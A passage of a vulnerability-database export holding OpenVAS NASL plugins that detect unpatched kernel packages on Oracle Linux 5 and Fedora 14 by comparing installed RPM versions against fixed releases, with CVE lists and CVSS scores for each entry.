exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~100.21.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~100.21.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~100.21.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~100.21.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~100.21.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~100.21.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~100.21.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~100.21.1.el5~1.5.1~4.0.23\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:46", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-02T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-16826", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-2963", "CVE-2010-3698", "CVE-2010-2962"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:1361412562310862654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-16826\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/049999.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862654\");\n script_version(\"$Revision: 8258 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 08:28:57 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16826\");\n script_cve_id(\"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2010-16826\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.6~48.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:55", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-02T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-16826", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-2963", "CVE-2010-3698", "CVE-2010-2962"], "modified": "2017-12-14T00:00:00", "id": "OPENVAS:862654", "href": "http://plugins.openvas.org/nasl.php?oid=862654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-16826\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/049999.html\");\n script_id(862654);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16826\");\n script_cve_id(\"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2010-16826\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.6~48.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:35", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-18493", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4072", "CVE-2010-2963", "CVE-2010-3698", "CVE-2010-4248", "CVE-2010-3880", "CVE-2010-2962", "CVE-2010-4077", "CVE-2010-4075"], "modified": "2017-12-14T00:00:00", "id": "OPENVAS:862706", "href": "http://plugins.openvas.org/nasl.php?oid=862706", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-18493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051853.html\");\n script_id(862706);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-18493\");\n script_cve_id(\"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2010-4075\", \"CVE-2010-4077\", \"CVE-2010-4248\");\n script_name(\"Fedora Update for kernel FEDORA-2010-18493\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.9~64.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:19", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-18493", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4072", "CVE-2010-2963", "CVE-2010-3698", "CVE-2010-4248", "CVE-2010-3880", "CVE-2010-2962", "CVE-2010-4077", "CVE-2010-4075"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:1361412562310862706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862706", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-18493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/051853.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862706\");\n script_version(\"$Revision: 8250 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 08:29:15 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-18493\");\n script_cve_id(\"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2010-4075\", \"CVE-2010-4077\", \"CVE-2010-4248\");\n script_name(\"Fedora Update for kernel FEDORA-2010-18493\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.9~64.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-20T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-7551", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-1494", "CVE-2010-2963", "CVE-2010-3698", "CVE-2011-1770", "CVE-2011-1495", "CVE-2010-3880", "CVE-2010-2962", "CVE-2011-1745"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-7551\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061366.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863279\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-20 08:37:08 +0200 (Mon, 20 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-7551\");\n script_cve_id(\"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-7551\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.13~92.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-25T10:55:32", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-06-20T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-7551", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-1494", "CVE-2010-2963", "CVE-2010-3698", "CVE-2011-1770", "CVE-2011-1495", "CVE-2010-3880", "CVE-2010-2962", "CVE-2011-1745"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863279", "href": "http://plugins.openvas.org/nasl.php?oid=863279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-7551\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061366.html\");\n script_id(863279);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-20 08:37:08 +0200 (Mon, 20 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-7551\");\n script_cve_id(\"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-7551\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.13~92.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-6541", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-1494", "CVE-2011-1478", "CVE-2010-2963", "CVE-2010-3698", "CVE-2011-1079", "CVE-2011-1495", "CVE-2010-3880", "CVE-2010-2962", "CVE-2011-1745"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863087", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863087", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-6541\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059860.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863087\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-6541\");\n script_cve_id(\"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2011-1478\", \"CVE-2011-1079\");\n script_name(\"Fedora Update for kernel FEDORA-2011-6541\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.13~91.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:55", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-6541", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-1494", "CVE-2011-1478", "CVE-2010-2963", "CVE-2010-3698", "CVE-2011-1079", "CVE-2011-1495", "CVE-2010-3880", "CVE-2010-2962", "CVE-2011-1745"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863087", "href": "http://plugins.openvas.org/nasl.php?oid=863087", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-6541\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public 